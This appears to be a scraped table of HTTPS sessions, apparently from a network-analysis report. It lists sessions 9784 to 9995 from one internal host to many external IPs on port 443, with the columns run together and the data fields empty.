                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9784192.168.2.1444414108.8.240.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9785192.168.2.145310835.157.99.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9786192.168.2.1456270200.101.112.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9787192.168.2.145723854.106.81.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9788192.168.2.1459680182.99.153.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9789192.168.2.1440204104.6.78.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9790192.168.2.1456858217.54.35.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9791192.168.2.1451762158.155.106.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9792192.168.2.145445435.104.198.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9793192.168.2.14336705.248.251.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9794192.168.2.144994497.59.109.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9795192.168.2.1456146133.218.125.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9796192.168.2.1457090122.36.121.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9797192.168.2.1452864210.213.135.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9798192.168.2.145657494.197.3.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9799192.168.2.1444166172.89.151.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9800192.168.2.1456650207.242.158.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9801192.168.2.144711874.139.85.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9802192.168.2.144716454.164.98.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9803192.168.2.145642650.136.25.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9804192.168.2.1453554106.209.220.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9805192.168.2.144446864.208.161.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9806192.168.2.145883083.106.57.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9807192.168.2.145340032.200.6.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9808192.168.2.1437736129.36.172.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9809192.168.2.1451544201.62.171.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9810192.168.2.1441148131.255.135.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9811192.168.2.1433578175.207.142.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9812192.168.2.144211078.66.234.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9813192.168.2.1458170138.144.101.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9814192.168.2.143946640.75.36.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9815192.168.2.1434880153.114.74.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9816192.168.2.14585544.215.74.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9817192.168.2.143578093.140.46.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9818192.168.2.144568280.151.105.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9819192.168.2.1434884177.208.173.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9820192.168.2.1443112152.72.177.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9821192.168.2.144586649.152.186.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9822192.168.2.1454096113.235.123.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9823192.168.2.144902471.146.15.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9824192.168.2.1459926126.146.47.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9825192.168.2.1448728196.147.247.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9826192.168.2.144681490.67.86.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9827192.168.2.1457784183.65.124.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9828192.168.2.145864047.120.17.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9829192.168.2.1446418143.190.26.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9830192.168.2.1442318195.119.134.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9831192.168.2.1444654194.171.94.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9832192.168.2.1435228177.37.131.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9833192.168.2.1436382200.82.131.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9834192.168.2.1454302206.128.110.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9835192.168.2.1441924218.34.97.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9836192.168.2.145781459.223.91.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9837192.168.2.1433674120.117.176.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9838192.168.2.1449072183.210.239.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9839192.168.2.1447132152.136.192.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9840192.168.2.145295886.186.105.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9841192.168.2.1448030175.245.211.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9842192.168.2.1440560141.53.225.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9843192.168.2.1443154114.221.42.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9844192.168.2.1438808131.198.114.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9845192.168.2.143600672.74.58.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9846192.168.2.144830088.222.7.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9847192.168.2.14469724.216.78.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9848192.168.2.144049897.190.116.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9849192.168.2.143969873.221.84.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9850192.168.2.145478635.160.252.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9851192.168.2.1447504166.121.91.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9852192.168.2.145718671.198.62.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9853192.168.2.1458598115.171.14.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9854192.168.2.1440406152.25.158.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9855192.168.2.14387089.126.115.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9856192.168.2.1445024190.59.46.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9857192.168.2.1454846160.205.100.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9858192.168.2.145411048.107.19.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9859192.168.2.143320263.238.199.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9860192.168.2.1440348106.221.240.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9861192.168.2.1444154148.132.251.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9862192.168.2.143509675.113.163.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9863192.168.2.1449866173.56.70.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9864192.168.2.144215891.76.235.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9865192.168.2.1433020125.18.121.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9866192.168.2.145311689.20.237.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9867192.168.2.143547264.212.195.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9868192.168.2.1446440129.183.114.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9869192.168.2.1456166137.130.166.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9870192.168.2.1439046155.210.127.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9871192.168.2.1436844121.106.97.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9872192.168.2.1450382220.121.246.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9873192.168.2.144752623.242.43.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9874192.168.2.143611660.28.50.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9875192.168.2.1437200109.231.98.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9876192.168.2.146001281.4.252.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9877192.168.2.1442282111.232.86.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9878192.168.2.1447720207.135.151.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9879192.168.2.1433420192.21.31.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9880192.168.2.144047232.84.146.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9881192.168.2.1454960126.239.31.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9882192.168.2.1452112155.93.191.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9883192.168.2.144542894.4.182.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9884192.168.2.143525487.195.82.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9885192.168.2.1437952178.136.223.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9886192.168.2.1434234125.198.199.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9887192.168.2.1457838164.214.177.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9888192.168.2.145059072.188.247.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9889192.168.2.1445408119.80.150.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9890192.168.2.144629267.7.58.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9891192.168.2.1434988104.97.4.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9892192.168.2.144525466.15.194.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9893192.168.2.1433842128.238.175.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9894192.168.2.1443236152.112.127.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9895192.168.2.1456486184.177.108.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9896192.168.2.1458696196.232.8.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9897192.168.2.1456636183.34.4.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9898192.168.2.145529094.178.85.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9899192.168.2.144537867.222.11.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9900192.168.2.1434414212.60.137.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9901192.168.2.1442826116.231.110.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9902192.168.2.145727068.8.117.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9903192.168.2.1444756130.192.21.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9904192.168.2.14374628.126.21.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9905192.168.2.145671847.193.148.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9906192.168.2.143950094.165.195.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9907192.168.2.1445202222.223.200.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9908192.168.2.145643691.38.132.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9909192.168.2.143831019.106.124.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9910192.168.2.1442850151.19.183.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9911192.168.2.1435808155.219.106.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9912192.168.2.144076268.34.16.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9913192.168.2.1453032198.73.42.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9914192.168.2.1444190144.166.36.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9915192.168.2.1433348179.115.25.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9916192.168.2.1453030122.157.106.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9917192.168.2.14334365.105.173.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9918192.168.2.145865099.254.39.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9919192.168.2.1456864204.226.111.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9920192.168.2.14423969.120.61.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9921192.168.2.14404165.72.43.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9922192.168.2.1452206110.72.127.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9923192.168.2.1435758115.186.122.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9924192.168.2.1440908196.172.39.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9925192.168.2.144135658.36.12.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9926192.168.2.1436830135.83.231.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9927192.168.2.145912088.159.170.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9928192.168.2.144014475.77.166.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9929192.168.2.14511768.143.98.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9930192.168.2.1446118211.114.230.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9931192.168.2.1443972195.101.9.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9932192.168.2.145126497.179.84.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9933192.168.2.145738044.157.146.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9934192.168.2.1433844146.235.210.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9935192.168.2.1444662142.235.233.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9936192.168.2.1443372114.190.24.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9937192.168.2.1440182116.68.223.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9938192.168.2.1437274138.248.30.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9939192.168.2.144614047.134.138.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9940192.168.2.1433996183.82.124.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9941192.168.2.1439744187.239.175.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9942192.168.2.144066046.100.137.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9943192.168.2.1452962144.254.37.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9944192.168.2.1449586170.66.90.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9945192.168.2.1433182151.210.179.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9946192.168.2.1444814204.143.208.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9947192.168.2.1455870202.151.113.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9948192.168.2.1448880142.80.248.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9949192.168.2.144036458.200.117.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9950192.168.2.1438786144.41.43.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9951192.168.2.1450652205.84.161.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9952192.168.2.145518052.93.170.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9953192.168.2.1453132106.19.49.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9954192.168.2.1449010184.35.116.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9955192.168.2.1437722122.61.144.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9956192.168.2.1458218138.121.136.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9957192.168.2.143421844.5.30.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9958192.168.2.1453398142.57.104.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9959192.168.2.1451130149.228.49.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9960192.168.2.144587857.112.158.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9961192.168.2.1434496186.51.127.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9962192.168.2.145766453.151.194.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9963192.168.2.1439302186.191.7.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9964192.168.2.1433656159.172.167.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9965192.168.2.1456906103.12.212.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9966192.168.2.143671823.239.104.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9967192.168.2.1435136189.105.87.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9968192.168.2.145356046.48.175.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9969192.168.2.145462478.162.115.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9970192.168.2.145707042.134.237.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9971192.168.2.14405942.152.79.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9972192.168.2.1449308210.51.165.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9973192.168.2.144730063.146.64.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9974192.168.2.145410094.176.208.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9975192.168.2.143632640.253.226.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9976192.168.2.14478165.8.154.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9977192.168.2.143513888.70.197.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9978192.168.2.144813084.161.172.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9979192.168.2.1436124161.186.124.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9980192.168.2.145041489.108.55.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9981192.168.2.146024451.100.84.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9982192.168.2.1438842111.191.101.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9983192.168.2.1447874117.16.156.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9984192.168.2.1440402116.166.116.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9985192.168.2.1458198121.39.120.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9986192.168.2.144079240.105.247.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9987192.168.2.143597424.235.170.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9988192.168.2.143778625.7.4.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9989192.168.2.1433672206.15.15.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9990192.168.2.1447232102.9.195.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9991192.168.2.145666095.117.240.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9992192.168.2.1433906188.33.203.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9993192.168.2.145005217.34.227.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9994192.168.2.144223081.147.180.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9995192.168.2.1436126117.175.129.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
